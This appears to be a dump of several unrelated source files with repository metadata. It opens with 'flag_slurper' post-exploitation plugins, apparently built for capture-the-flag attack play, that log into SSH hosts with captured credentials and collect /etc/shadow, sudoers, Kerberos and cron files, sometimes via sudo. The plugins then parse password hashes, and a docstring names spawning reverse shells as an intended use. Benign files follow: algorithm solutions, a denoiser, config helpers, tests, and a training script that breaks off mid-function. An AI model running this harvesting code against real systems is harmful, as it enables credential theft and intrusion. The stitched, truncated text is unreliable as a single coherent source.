super().run(service, context) logger.debug('Running post ssh exfil') if not self.config: self.config = { 'files': [], 'merge_files': True, } credentials: Iterable[Credential] = context['credentials'] ssh: paramiko.SSHClient = context['ssh'] def _map_creds(bag): return bag.credentials.where(Credential.service == service).get() credentials = map(_map_creds, credentials) working_creds = filter(lambda c: c.state == Credential.WORKS, credentials) for credential in working_creds: ssh.connect(service.service_url, service.service_port, credential.bag.username, credential.bag.password) self._post(credential, ssh) def _post(self, credential: Credential, ssh: paramiko.SSHClient): sensitive_files: list = self.config['files'] if self.config['merge_files']: sensitive_files.extend(SENSITIVE_FILES) # Stage 0 - Determine access level # If we have sudo access, we need to tell the various exploit # functions so they can use it. sudo = credential.bag.password if credential.sudo else None # Stag 1 - Sensitive Files def _get_file_info(path: str) -> Tuple[str, str]: name_cmd = 'file -b {}'.format(path) mime_cmd = 'file -i -b {}'.format(path) if sudo: _, stdout, _ = run_sudo(ssh, name_cmd, sudo) name = stdout.read().decode('utf-8').strip() _, stdout, _ = run_sudo(ssh, mime_cmd, sudo) mime = stdout.read().decode('utf-8').strip() else: name = run_command(ssh, name_cmd) mime = run_command(ssh, mime_cmd) return name, mime queue = deque(sensitive_files) while len(queue): path = queue.pop() # Path is a directory if path[-1] == '/': directory = get_directory(ssh, path, sudo) if directory: queue.extend(map(lambda x: os.path.join(path, x.strip()), directory)) # Path is a wildcard elif '*' in path: files = expand_wildcard(ssh, path, sudo) if files: queue.extend(map(lambda x: x.strip(), files)) # Path shold be a file else: if File.select().where(File.service == credential.service, File.path == path).count() >= 1: continue info = _get_file_info(path) contents = get_file(ssh, path, sudo) if contents: File.create(path=path, contents=contents, mime_type=info[1], info=info[0], service=credential.service) else: logger.error('There was an error retrieving sensitive file %s: %s', path, contents) return False return True def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 class ShadowExtractor(PostPlugin): """ Extract hashes out of collected files. This plugin will run automatically for all services using port 22. """ name = 'shadow' schema = {} context_schema = {} depends_on = ['ssh_exfil'] def run(self, service: Service, context: PostContext): super().run(service, context) logger.debug('Running post shadow extractor') files = File.select().where(File.service == service, File.path.endswith('/shadow')) for file in files: contents = file.contents.tobytes().decode('utf-8') [self._parse_shadow(line, file, service) for line in contents.split('\n')] @staticmethod def _parse_shadow(line: str, file: File, service: Service): (username, hash, *_) = line.split(':') if hash == '*' or hash == '!': logger.debug('skipping user without hash %s', username) return logger.info('Found valid hash for %s', username) ShadowEntry.create(source=file, service=service, username=username, hash=hash) def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 registry = PluginRegistry() registry.register(SSHFileExfil) registry.register(ShadowExtractor)
""" Tasks to do after checking/retrieving flags. These functions **MUST NOT** bubble exceptions. A post task failing does not mean the protocol has failed, just any of the fun stuff you want to do afterwards. Things that belong here: - grabbing fun (non-flag) files - spawning reverse shells Things that don't belong here: - grabbing flags """ import logging import os from abc import ABC, abstractmethod from collections import deque from typing import Tuple, Type, Dict, List, Iterable import paramiko from schema import Schema, Optional from flag_slurper.autolib import Service from .exploit import get_directory, get_file, run_command, run_sudo, expand_wildcard from .models import Credential, File, ShadowEntry logger = logging.getLogger(__name__) #: Sensitive files to find on systems. Paths #: ending in / are directories. SENSITIVE_FILES = [ # Authentication '/etc/passwd', '/etc/shadow', '/etc/sudoers', '/etc/sudoers.d/', # Kerberos '/tmp/krb*', '/etc/krb*', '/etc/sssd/', # Cron '/etc/crontab', '/etc/cron.d/', '/etc/cron.daily/', '/etc/cron.hourly/', '/etc/cron.monthly/', '/etc/cron.weekly/', # Shell configs and profiles '/etc/skel/', '/etc/**/.bashrc', '/etc/**/.bash_profile', '/etc/**/.zshrc', '/etc/**/.profile' ] class PostContext(dict): """ A wrapper method for passing post pwn methods arbitrary data. This allows pwn functions to pass whatever arbitrary data they need onto the post plugins in an extensible way. """ def validate(self, schema: dict) -> 'PostContext': """ Allow a plugin to enforce their own schema for their context data. The ``Schema`` object is created by the context, not the plugin. :param schema: A dictionary containing the schema :return: Returns the context for chaining """ Schema(schema, ignore_extra_keys=True).validate(self) return self class PostPlugin(ABC): """ Defines a post pwn plugin. Plugins are configured in the ``post`` key to a project. For example: .. code-block:: yaml --- _version: "0.1" ... post: - service: WWW SSH commands: - <post plugin name>: <arguments> """ name = None schema = None context_schema = None config = None depends_on = [] def configure(self, config: dict) -> dict: """ Configure the plugin. This provides the base configuration implementation. It simply just validates the schema against the given config. Plugins that need more involved configuration may override this method. Plugins must define their own schema by overriding the ``schema`` class variable. :param config: :return: """ if not self.schema: raise ValueError('The schema for {} has not been configured'.format(self.name)) config = Schema(self.schema).validate(config) self.config = config logger.info('Configuring plugin: %s', self.config) return config def unconfigure(self): """ Remove any previous configuration. This is used between post exploits. """ self.config = None @abstractmethod def run(self, service: Service, context: PostContext) -> bool: """ Run the post pwn plugin. This is where the plugin will perform any actions it needs. All run methods MUST call their super before accessing the given context, otherwise it must attempt to safely access context entries. :param service: The service we are currently attacking :param context: The context given to the post plugin :returns: True if successful, False otherwise :raises ValueError: if the context schema has not been set """ if self.context_schema is None: raise ValueError('The context_schema for {} has not been configured'.format(self.name)) context.validate(self.context_schema) return True @abstractmethod def predicate(self, service: Service, context: PostContext) -> bool: """ Determines whether the plugin should be run for the given service, context, and configuration. The plugin's configuration will have been validated at this point. :param service: The current service to test against :param context: The current post context :return: True if this plugin should run, False otherwise """ raise NotImplementedError class PluginRegistry: """ The post pwn plugin registry. This handles configuring and figuring out which plugins will need to be run. """ def __init__(self): self.registry: Dict[str, PostPlugin] = {} def register(self, plugin: Type[PostPlugin]): """ Register a plugin with the plugin registry. :param plugin: The plugin class to register. :raises ValueError: If the plugin does not subclass :py:class:`PostPlugin`. :raises ValueError: If the plugin name is already taken. """ if not issubclass(plugin, PostPlugin): raise ValueError('Plugins must extend PostPlugin') if plugin.name in self.registry: raise ValueError('Plugin already registered by this name: {}'.format(plugin.name)) self.registry[plugin.name] = plugin() # The plugins that will be used for the current run self.run_plugins = [] def configure(self, config: List[dict]): """ Configure the plugins that will be used for this run. This will accept the ``commands`` section for the current service. :param config: The post config for the current service. :raises KeyError: When a command is specified that doesn't exist. :raises ValueError: When more than one key in a command entry. :raises ValueError: When a command uses an unknown plugin. """ # Unconfigure all plugins from a previous run list(map(PostPlugin.unconfigure, self.registry.values())) self.run_plugins = [] # Configure used plugins for for command in config: if len(command.keys()) != 1: raise ValueError('Each commands entry should have exactly one key') name = list(command.keys())[0] if name not in self.registry: raise KeyError('Unknown plugin: {}'.format(name)) plugin = self.registry[name] plugin.configure(command[name]) self.run_plugins.append(name) def post(self, service: Service, context: PostContext) -> bool: """ Runs applicable post pwn plugins against the given service, with the given context. :param service: The service to post pwn :param context: The context for the server :return: Whether all post invocation were successful """ results = [plugin.run(service, context) for plugin in self.registry.values() if plugin.name in self.run_plugins or plugin.predicate(service, context)] return all(results) class SSHFileExfil(PostPlugin): """ The ``ssh_exfil`` plugin attempt to find as many ``SENSITIVE_FILES`` as possible. This plugin takes some optional parameters: ``files``: List[str] A list of files to look for. All entries ending with a ``/`` are considered directories and will be searched. ``merge_files``: Boolean Set to ``True`` if you want to merge ``files`` with ``SENSITIVE_FILES``, otherwise only ``files`` will be searched. This plugin will run automatically for all services using port 22. """ name = 'ssh_exfil' schema = { Optional('files', default=[]): [str], Optional('merge_files', default=True): bool, } context_schema = { 'ssh': paramiko.SSHClient, 'credentials': object, } def run(self, service: Service, context: PostContext): super().run(service, context) logger.debug('Running post ssh exfil') if not self.config: self.config = { 'files': [], 'merge_files': True, } credentials: Iterable[Credential] = context['credentials'] ssh: paramiko.SSHClient = context['ssh'] def _map_creds(bag): return bag.credentials.where(Credential.service == service).get() credentials = map(_map_creds, credentials) working_creds = filter(lambda c: c.state == Credential.WORKS, credentials) for credential in working_creds: ssh.connect(service.service_url, service.service_port, credential.bag.username, credential.bag.password) self._post(credential, ssh) def _post(self, credential: Credential, ssh: paramiko.SSHClient): sensitive_files: list = self.config['files'] if self.config['merge_files']: sensitive_files.extend(SENSITIVE_FILES) # Stage 0 - Determine access level # If we have sudo access, we need to tell the various exploit # functions so they can use it. sudo = credential.bag.password if credential.sudo else None # Stag 1 - Sensitive Files def _get_file_info(path: str) -> Tuple[str, str]: name_cmd = 'file -b {}'.format(path) mime_cmd = 'file -i -b {}'.format(path) if sudo: _, stdout, _ = run_sudo(ssh, name_cmd, sudo) name = stdout.read().decode('utf-8').strip() _, stdout, _ = run_sudo(ssh, mime_cmd, sudo) mime = stdout.read().decode('utf-8').strip() else: name = run_command(ssh, name_cmd) mime = run_command(ssh, mime_cmd) return name, mime queue = deque(sensitive_files) while len(queue): path = queue.pop() # Path is a directory if path[-1] == '/': directory = get_directory(ssh, path, sudo) if directory: queue.extend(map(lambda x: os.path.join(path, x.strip()), directory)) # Path is a wildcard elif '*' in path: files = expand_wildcard(ssh, path, sudo) if files: queue.extend(map(lambda x: x.strip(), files)) # Path shold be a file else: if File.select().where(File.service == credential.service, File.path == path).count() >= 1: continue info = _get_file_info(path) contents = get_file(ssh, path, sudo) if contents: File.create(path=path, contents=contents, mime_type=info[1], info=info[0], service=credential.service) else: logger.error('There was an error retrieving sensitive file %s: %s', path, contents) return False return True def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 class ShadowExtractor(PostPlugin): """ Extract hashes out of collected files. This plugin will run automatically for all services using port 22. """ name = 'shadow' schema = {} context_schema = {} depends_on = ['ssh_exfil'] def run(self, service: Service, context: PostContext): super().run(service, context) logger.debug('Running post shadow extractor') files = File.select().where(File.service == service, File.path.endswith('/shadow')) for file in files: contents = file.contents.tobytes().decode('utf-8') [self._parse_shadow(line, file, service) for line in contents.split('\n')] @staticmethod def _parse_shadow(line: str, file: File, service: Service): (username, hash, *_) = line.split(':') if hash == '*' or hash == '!': logger.debug('skipping user without hash %s', username) return logger.info('Found valid hash for %s', username) ShadowEntry.create(source=file, service=service, username=username, hash=hash) def predicate(self, service: Service, context: PostContext) -> bool: return service.service_port == 22 registry = PluginRegistry() registry.register(SSHFileExfil) registry.register(ShadowExtractor)
en
0.819109
Tasks to do after checking/retrieving flags. These functions **MUST NOT** bubble exceptions. A post task failing does not mean the protocol has failed, just any of the fun stuff you want to do afterwards. Things that belong here: - grabbing fun (non-flag) files - spawning reverse shells Things that don't belong here: - grabbing flags #: Sensitive files to find on systems. Paths #: ending in / are directories. # Authentication # Kerberos # Cron # Shell configs and profiles A wrapper method for passing post pwn methods arbitrary data. This allows pwn functions to pass whatever arbitrary data they need onto the post plugins in an extensible way. Allow a plugin to enforce their own schema for their context data. The ``Schema`` object is created by the context, not the plugin. :param schema: A dictionary containing the schema :return: Returns the context for chaining Defines a post pwn plugin. Plugins are configured in the ``post`` key to a project. For example: .. code-block:: yaml --- _version: "0.1" ... post: - service: WWW SSH commands: - <post plugin name>: <arguments> Configure the plugin. This provides the base configuration implementation. It simply just validates the schema against the given config. Plugins that need more involved configuration may override this method. Plugins must define their own schema by overriding the ``schema`` class variable. :param config: :return: Remove any previous configuration. This is used between post exploits. Run the post pwn plugin. This is where the plugin will perform any actions it needs. All run methods MUST call their super before accessing the given context, otherwise it must attempt to safely access context entries. :param service: The service we are currently attacking :param context: The context given to the post plugin :returns: True if successful, False otherwise :raises ValueError: if the context schema has not been set Determines whether the plugin should be run for the given service, context, and configuration. The plugin's configuration will have been validated at this point. :param service: The current service to test against :param context: The current post context :return: True if this plugin should run, False otherwise The post pwn plugin registry. This handles configuring and figuring out which plugins will need to be run. Register a plugin with the plugin registry. :param plugin: The plugin class to register. :raises ValueError: If the plugin does not subclass :py:class:`PostPlugin`. :raises ValueError: If the plugin name is already taken. # The plugins that will be used for the current run Configure the plugins that will be used for this run. This will accept the ``commands`` section for the current service. :param config: The post config for the current service. :raises KeyError: When a command is specified that doesn't exist. :raises ValueError: When more than one key in a command entry. :raises ValueError: When a command uses an unknown plugin. # Unconfigure all plugins from a previous run # Configure used plugins for Runs applicable post pwn plugins against the given service, with the given context. :param service: The service to post pwn :param context: The context for the server :return: Whether all post invocation were successful The ``ssh_exfil`` plugin attempt to find as many ``SENSITIVE_FILES`` as possible. This plugin takes some optional parameters: ``files``: List[str] A list of files to look for. All entries ending with a ``/`` are considered directories and will be searched. ``merge_files``: Boolean Set to ``True`` if you want to merge ``files`` with ``SENSITIVE_FILES``, otherwise only ``files`` will be searched. This plugin will run automatically for all services using port 22. # Stage 0 - Determine access level # If we have sudo access, we need to tell the various exploit # functions so they can use it. # Stag 1 - Sensitive Files # Path is a directory # Path is a wildcard # Path shold be a file Extract hashes out of collected files. This plugin will run automatically for all services using port 22.
2.366428
2
python/680/680.py
yiGmMk/leetcode
0
6618608
<reponame>yiGmMk/leetcode class Solution: def validPalindrome(self, s: str) -> bool: def check(low,high): i,j=low,high while i<j: if s[i]!=s[j]: return False; i+=1 j-=1 return True low,high=0,len(s)-1 while low<high: if s[low]==s[high]: low+=1 high-=1 else: return check(low,high-1) or check(low+1,high) return True s=Solution() s.validPalindrome("abc")
class Solution: def validPalindrome(self, s: str) -> bool: def check(low,high): i,j=low,high while i<j: if s[i]!=s[j]: return False; i+=1 j-=1 return True low,high=0,len(s)-1 while low<high: if s[low]==s[high]: low+=1 high-=1 else: return check(low,high-1) or check(low+1,high) return True s=Solution() s.validPalindrome("abc")
none
1
3.500323
4
TVD/mctv1d.py
Kevin-McIsaac/1D-MCTV-Denoising
2
6618609
<reponame>Kevin-McIsaac/1D-MCTV-Denoising<filename>TVD/mctv1d.py<gh_stars>1-10 # -*- coding: utf-8 -*- """ Created on Sat Jul 14 16:26:18 2018 @author: <NAME> Paper: <NAME>. & <NAME>.: Minmax-concave Total Variation Denoising. Signal, Image and Video Processing (2018). doi: 10.1007/s11760-018-1248-2 Algorithm for arg_min_X 0.5|Y - X|_2^2 + lamda*|X|_MCTV """ import tv1d import numpy as np def denoising_1D_MCTV(Y, para): K, N = 0, len(Y) X = np.zeros(N) U = np.ones(N) lamda, alpha = para.regularization, para.nonconvexity num, err = para.most_iter_num, para.convergence while K <= num and np.linalg.norm(U - X) > err: C = Dxt(Dx(X)) - Dxt(shrink(Dx(X), 1 / alpha)) Z = Y + lamda * alpha * C U = X X = tv1d.denoising_1D_TV(Z, lamda) K += 1 return X def shrink(Y, lamda): return np.fmax(np.fabs(Y) - lamda, 0) * np.sign(Y) def Dx(Y): return np.ediff1d(Y, to_begin = Y[0] - Y[-1]) def Dxt(Y): X = np.ediff1d(Y[::-1])[::-1] return np.append(X, Y[-1] - Y[0])
# -*- coding: utf-8 -*- """ Created on Sat Jul 14 16:26:18 2018 @author: <NAME> Paper: <NAME>. & <NAME>.: Minmax-concave Total Variation Denoising. Signal, Image and Video Processing (2018). doi: 10.1007/s11760-018-1248-2 Algorithm for arg_min_X 0.5|Y - X|_2^2 + lamda*|X|_MCTV """ import tv1d import numpy as np def denoising_1D_MCTV(Y, para): K, N = 0, len(Y) X = np.zeros(N) U = np.ones(N) lamda, alpha = para.regularization, para.nonconvexity num, err = para.most_iter_num, para.convergence while K <= num and np.linalg.norm(U - X) > err: C = Dxt(Dx(X)) - Dxt(shrink(Dx(X), 1 / alpha)) Z = Y + lamda * alpha * C U = X X = tv1d.denoising_1D_TV(Z, lamda) K += 1 return X def shrink(Y, lamda): return np.fmax(np.fabs(Y) - lamda, 0) * np.sign(Y) def Dx(Y): return np.ediff1d(Y, to_begin = Y[0] - Y[-1]) def Dxt(Y): X = np.ediff1d(Y[::-1])[::-1] return np.append(X, Y[-1] - Y[0])
en
0.507922
# -*- coding: utf-8 -*- Created on Sat Jul 14 16:26:18 2018 @author: <NAME> Paper: <NAME>. & <NAME>.: Minmax-concave Total Variation Denoising. Signal, Image and Video Processing (2018). doi: 10.1007/s11760-018-1248-2 Algorithm for arg_min_X 0.5|Y - X|_2^2 + lamda*|X|_MCTV
2.403594
2
line/notify.py
Katsuya-Ishiyama/hoikuen-jisan
0
6618610
<filename>line/notify.py import requests from utils import load_settings LINE_NOTIFY_API = "https://notify-api.line.me/api/notify" class LineNotifier(object): def __init__(self, test=False): self.settings = load_settings("settings.yml")["line"] self.environment = "test" if test else "production" def send(self, message: str): token = self.settings["token"][self.environment] headers = {'Authorization': f'Bearer {token}'} data = {'message': message} requests.post(LINE_NOTIFY_API, headers=headers, data=data)
<filename>line/notify.py import requests from utils import load_settings LINE_NOTIFY_API = "https://notify-api.line.me/api/notify" class LineNotifier(object): def __init__(self, test=False): self.settings = load_settings("settings.yml")["line"] self.environment = "test" if test else "production" def send(self, message: str): token = self.settings["token"][self.environment] headers = {'Authorization': f'Bearer {token}'} data = {'message': message} requests.post(LINE_NOTIFY_API, headers=headers, data=data)
none
1
2.356021
2
nuclear/config.py
afloers/nuclear
0
6618611
import logging import os import shutil import yaml from astropy.config import get_config_dir from nuclear import __path__ as NUCLEAR_PATH NUCLEAR_PATH = NUCLEAR_PATH[0] DEFAULT_CONFIG_PATH = os.path.join(NUCLEAR_PATH, 'default_tardisnuclear_config.yml') DEFAULT_DATA_DIR = os.path.join(os.path.expanduser('~'), 'Downloads', 'tardisnuclear') logger = logging.getLogger(__name__) def get_configuration(): config_fpath = os.path.join(get_config_dir(), 'tardisnuclear_config.yml') if not os.path.exists(config_fpath): logger.warning(f"Configuration File {config_fpath} does not exist - " f"creating new one from default") shutil.copy(DEFAULT_CONFIG_PATH, config_fpath) return yaml.load(open(config_fpath), Loader=yaml.FullLoader) def get_data_dir(): config = get_configuration() data_dir = config.get('data_dir', None) if data_dir is None: config_fpath = os.path.join(get_config_dir(), 'tardisnuclear_config.yml') logging.critical('\n{line_stars}\n\nTARDISNUCLEAR will download nuclear data to its data directory {default_data_dir}\n\n' 'TARDISNUCLEAR DATA DIRECTORY not specified in {config_file}:\n\n' 'ASSUMING DEFAULT DATA DIRECTORY {default_data_dir}\n ' 'YOU CAN CHANGE THIS AT ANY TIME IN {config_file} \n\n' '{line_stars} \n\n'.format(line_stars='*'*80, config_file=config_fpath, default_data_dir=DEFAULT_DATA_DIR)) if not os.path.exists(DEFAULT_DATA_DIR): os.makedirs(DEFAULT_DATA_DIR) config['data_dir'] = DEFAULT_DATA_DIR yaml.dump(config, open(config_fpath, 'w'), default_flow_style=False) data_dir = DEFAULT_DATA_DIR if not os.path.exists(data_dir): raise IOError(f'Data directory specified in {data_dir} does not exist') logger.info(f"Using TARDISNuclear Data directory {data_dir}") return data_dir
import logging import os import shutil import yaml from astropy.config import get_config_dir from nuclear import __path__ as NUCLEAR_PATH NUCLEAR_PATH = NUCLEAR_PATH[0] DEFAULT_CONFIG_PATH = os.path.join(NUCLEAR_PATH, 'default_tardisnuclear_config.yml') DEFAULT_DATA_DIR = os.path.join(os.path.expanduser('~'), 'Downloads', 'tardisnuclear') logger = logging.getLogger(__name__) def get_configuration(): config_fpath = os.path.join(get_config_dir(), 'tardisnuclear_config.yml') if not os.path.exists(config_fpath): logger.warning(f"Configuration File {config_fpath} does not exist - " f"creating new one from default") shutil.copy(DEFAULT_CONFIG_PATH, config_fpath) return yaml.load(open(config_fpath), Loader=yaml.FullLoader) def get_data_dir(): config = get_configuration() data_dir = config.get('data_dir', None) if data_dir is None: config_fpath = os.path.join(get_config_dir(), 'tardisnuclear_config.yml') logging.critical('\n{line_stars}\n\nTARDISNUCLEAR will download nuclear data to its data directory {default_data_dir}\n\n' 'TARDISNUCLEAR DATA DIRECTORY not specified in {config_file}:\n\n' 'ASSUMING DEFAULT DATA DIRECTORY {default_data_dir}\n ' 'YOU CAN CHANGE THIS AT ANY TIME IN {config_file} \n\n' '{line_stars} \n\n'.format(line_stars='*'*80, config_file=config_fpath, default_data_dir=DEFAULT_DATA_DIR)) if not os.path.exists(DEFAULT_DATA_DIR): os.makedirs(DEFAULT_DATA_DIR) config['data_dir'] = DEFAULT_DATA_DIR yaml.dump(config, open(config_fpath, 'w'), default_flow_style=False) data_dir = DEFAULT_DATA_DIR if not os.path.exists(data_dir): raise IOError(f'Data directory specified in {data_dir} does not exist') logger.info(f"Using TARDISNuclear Data directory {data_dir}") return data_dir
none
1
2.482386
2
sprint-challenge/web_app/app.py
FuriouStyles/DS-Unit-3-Sprint-3-Productization-and-Cloud
0
6618612
<reponame>FuriouStyles/DS-Unit-3-Sprint-3-Productization-and-Cloud import os from dotenv import load_dotenv from flask import Flask, jsonify, request, render_template from flask_migrate import Migrate load_dotenv() DATABASE_URL = os.getenv("DATABASE_URL") # Initialize the webapp with persistent services def create_app(): app = Flask(__name__) app.config["SQLALCHEMY_DATABASE_URI"] = DATABASE_URL app.config["SQLALCHEMY_DATABASE_TRACKING"] = False db.init_app(app) migrate.init_app(app, db) return app
import os from dotenv import load_dotenv from flask import Flask, jsonify, request, render_template from flask_migrate import Migrate load_dotenv() DATABASE_URL = os.getenv("DATABASE_URL") # Initialize the webapp with persistent services def create_app(): app = Flask(__name__) app.config["SQLALCHEMY_DATABASE_URI"] = DATABASE_URL app.config["SQLALCHEMY_DATABASE_TRACKING"] = False db.init_app(app) migrate.init_app(app, db) return app
en
0.855886
# Initialize the webapp with persistent services
2.344152
2
challenge/acme_test.py
jonathanmendoza-tx/DS-Unit-3-Sprint-1-Software-Engineering
0
6618613
import unittest from acme import Product from acme_report import generate_products, ADJECTIVES, NOUNS class AcmeProductTests(unittest.TestCase): """ Making sure Acme products are the tops! """ def test_default_product_price(self): """ Test default product price being 10. """ prod = Product('Test Product') self.assertEqual(prod.price, 10) def test_default_product_weight(self): """ Test default product weight being 20. """ prod = Product('Test Product') self.assertEqual(prod.weight, 20) def test_stealability_explode(self): """ Test stealability and explode function with other than default values """ prod = Product('Test Product') prod.weight = 100 prod.price = 1000 self.assertEqual(Product.stealability(prod), 'Very stealable!') self.assertEqual(Product.explode(prod),'...BABOOM!!') class AcmeReportTests(unittest.TestCase): def test_default_num_products(self): """ Test that products really does receive a list of default length 30 """ products = generate_products() self.assertEqual(len(products), 30) def test_legal_names(self): """ checks that the generated names for a default batch of products are all valid possible names to generate (adjective, space, noun, from the lists of possible words) """ products = generate_products() check_for_adj = [] check_for_noun = [] for i in range(len(products)): """ Split and collect the first and second words of each product in a list. Check if the first names match to adjectives and the second to nouns """ name = str(products[i]).split() check_for_adj += [name[0]] check_for_nouns += [name[1]] for j in range(len(set(check_for_adj))): self.assertIn(list(set(check_for_adj))[j], ADJECTIVES) for k in range(len(set(check_for_noun))): self.assertIn(list(set(check_for_nouns))[k], NOUNS) if __name__ == '__main__': unittest.main()
import unittest from acme import Product from acme_report import generate_products, ADJECTIVES, NOUNS class AcmeProductTests(unittest.TestCase): """ Making sure Acme products are the tops! """ def test_default_product_price(self): """ Test default product price being 10. """ prod = Product('Test Product') self.assertEqual(prod.price, 10) def test_default_product_weight(self): """ Test default product weight being 20. """ prod = Product('Test Product') self.assertEqual(prod.weight, 20) def test_stealability_explode(self): """ Test stealability and explode function with other than default values """ prod = Product('Test Product') prod.weight = 100 prod.price = 1000 self.assertEqual(Product.stealability(prod), 'Very stealable!') self.assertEqual(Product.explode(prod),'...BABOOM!!') class AcmeReportTests(unittest.TestCase): def test_default_num_products(self): """ Test that products really does receive a list of default length 30 """ products = generate_products() self.assertEqual(len(products), 30) def test_legal_names(self): """ checks that the generated names for a default batch of products are all valid possible names to generate (adjective, space, noun, from the lists of possible words) """ products = generate_products() check_for_adj = [] check_for_noun = [] for i in range(len(products)): """ Split and collect the first and second words of each product in a list. Check if the first names match to adjectives and the second to nouns """ name = str(products[i]).split() check_for_adj += [name[0]] check_for_nouns += [name[1]] for j in range(len(set(check_for_adj))): self.assertIn(list(set(check_for_adj))[j], ADJECTIVES) for k in range(len(set(check_for_noun))): self.assertIn(list(set(check_for_nouns))[k], NOUNS) if __name__ == '__main__': unittest.main()
en
0.846179
Making sure Acme products are the tops! Test default product price being 10. Test default product weight being 20. Test stealability and explode function with other than default values Test that products really does receive a list of default length 30 checks that the generated names for a default batch of products are all valid possible names to generate (adjective, space, noun, from the lists of possible words) Split and collect the first and second words of each product in a list. Check if the first names match to adjectives and the second to nouns
3.637197
4
src/main.py
YugeTen/fish
71
6618614
<reponame>YugeTen/fish<gh_stars>10-100 import copy import argparse import datetime import json import os import sys import csv import tqdm from collections import defaultdict from tempfile import mkdtemp import numpy as np import torch import torch.optim as optim import models from config import dataset_defaults from utils import unpack_data, sample_domains, save_best_model, \ Logger, return_predict_fn, return_criterion, fish_step runId = datetime.datetime.now().isoformat().replace(':', '_') torch.backends.cudnn.benchmark = True parser = argparse.ArgumentParser(description='Gradient Matching for Domain Generalization.') # General parser.add_argument('--dataset', type=str, help="Name of dataset, choose from amazon, camelyon, " "cdsprites, civil, fmow, iwildcam, poverty") parser.add_argument('--algorithm', type=str, help='training scheme, choose between fish or erm.') parser.add_argument('--experiment', type=str, default='.', help='experiment name, set as . for automatic naming.') parser.add_argument('--data-dir', type=str, help='path to data dir') parser.add_argument('--stratified', action='store_true', default=False, help='whether to use stratified sampling for classes') parser.add_argument('--num-domains', type=int, default=15, help='Number of domains, only specify for cdsprites') # Computation parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA use') parser.add_argument('--seed', type=int, default=-1, help='random seed, set as -1 for random.') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() device = torch.device("cuda" if args.cuda else "cpu") args_dict = args.__dict__ args_dict.update(dataset_defaults[args.dataset]) args = argparse.Namespace(**args_dict) # Choosing and saving a random seed for reproducibility if args.seed == -1: args.seed = int(torch.randint(0, 2 ** 32 - 1, (1,)).item()) torch.manual_seed(args.seed) np.random.seed(args.seed) torch.cuda.manual_seed_all(args.seed) torch.manual_seed(args.seed) torch.backends.cudnn.deterministic = True # experiment directory setup args.experiment = f"{args.dataset}_{args.algorithm}" \ if args.experiment == '.' else args.experiment directory_name = '../experiments/{}'.format(args.experiment) if not os.path.exists(directory_name): os.makedirs(directory_name) runPath = mkdtemp(prefix=runId, dir=directory_name) # logging setup sys.stdout = Logger('{}/run.log'.format(runPath)) print('RunID:' + runPath) with open('{}/args.json'.format(runPath), 'w') as fp: json.dump(args.__dict__, fp) torch.save(args, '{}/args.rar'.format(runPath)) # load model modelC = getattr(models, args.dataset) train_loader, tv_loaders = modelC.getDataLoaders(args, device=device) val_loader, test_loader = tv_loaders['val'], tv_loaders['test'] model = modelC(args, weights=None).to(device) assert args.optimiser in ['SGD', 'Adam'], "Invalid choice of optimiser, choose between 'Adam' and 'SGD'" opt = getattr(optim, args.optimiser) optimiserC = opt(model.parameters(), **args.optimiser_args) predict_fn, criterion = return_predict_fn(args.dataset), return_criterion(args.dataset) def pretrain(train_loader, pretrain_iters): aggP = defaultdict(list) aggP['val_stat'] = [0.] n_iters = 0 pretrain_epochs = int(np.ceil(pretrain_iters/len(train_loader))) pbar = tqdm.tqdm(total = pretrain_iters) for epoch in range(pretrain_epochs): for i, data in enumerate(train_loader): model.train() # get the inputs x, y = unpack_data(data, device) optimiserC.zero_grad() y_hat = model(x) loss = criterion(y_hat, y) loss.backward() optimiserC.step() n_iters += 1 # display progress pbar.set_description(f"Pretrain {n_iters}/{pretrain_iters} iters") pbar.update(1) if (i + 1) % args.print_iters == 0 and args.print_iters != -1: test(val_loader, aggP, loader_type='val', verbose=False) test(test_loader, aggP, loader_type='test', verbose=False) save_best_model(model, runPath, aggP, args) if n_iters == pretrain_iters: test(val_loader, aggP, loader_type='val', verbose=False) test(test_loader, aggP, loader_type='test', verbose=False) save_best_model(model, runPath, aggP, args) break pbar.close() model.load_state_dict(torch.load(runPath + '/model.rar')) print('Finished ERM pre-training!') def train_erm(train_loader, epoch, agg): running_loss = 0 total_iters = len(train_loader) print('\n====> Epoch: {:03d} '.format(epoch)) for i, data in enumerate(train_loader): model.train() # get the inputs x, y = unpack_data(data, device) optimiserC.zero_grad() y_hat = model(x) loss = criterion(y_hat, y) loss.backward() optimiserC.step() running_loss += loss.item() # print statistics if (i + 1) % args.print_iters == 0 and args.print_iters != -1 and args.algorithm != 'fish': agg['train_loss'].append(running_loss / args.print_iters) agg['train_iters'].append(i+1+epoch*total_iters) print('iteration {:05d}/{:d}: loss: {:6.3f}'.format(i + 1, total_iters, running_loss / args.print_iters)) test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') running_loss = 0.0 save_best_model(model, runPath, agg, args) def train_fish(train_loader, epoch, agg): model.train() train_loader.dataset.reset_batch() i = 0 print('\n====> Epoch: {:03d} '.format(epoch)) opt_inner_pre = None while sum([l > 1 for l in train_loader.dataset.batches_left.values()]) >= args.meta_steps: i += 1 # sample `meta_steps` number of domains to use for the inner loop domains = sample_domains(train_loader, args.meta_steps, args.stratified).tolist() # prepare model for inner loop update model_inner = copy.deepcopy(model) model_inner.train() opt_inner = opt(model_inner.parameters(), **args.optimiser_args) if opt_inner_pre is not None and args.reload_inner_optim: opt_inner.load_state_dict(opt_inner_pre) # inner loop update for domain in domains: data = train_loader.dataset.get_batch(domain) x, y = unpack_data(data, device) opt_inner.zero_grad() y_hat = model_inner(x) loss = criterion(y_hat, y) loss.backward() opt_inner.step() opt_inner_pre = opt_inner.state_dict() # fish update meta_weights = fish_step(meta_weights=model.state_dict(), inner_weights=model_inner.state_dict(), meta_lr=args.meta_lr / args.meta_steps) model.reset_weights(meta_weights) # log the number of batches left for each domain for domain in domains: train_loader.dataset.batches_left[domain] = \ train_loader.dataset.batches_left[domain] - 1 \ if train_loader.dataset.batches_left[domain] > 1 else 1 if (i + 1) % args.print_iters == 0 and args.print_iters != -1: print(f'iteration {(i + 1):05d}: ') test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') model.train() save_best_model(model, runPath, agg, args) def test(test_loader, agg, loader_type='test', verbose=True, save_ypred=False): model.eval() yhats, ys, metas = [], [], [] with torch.no_grad(): for i, (x, y, meta) in 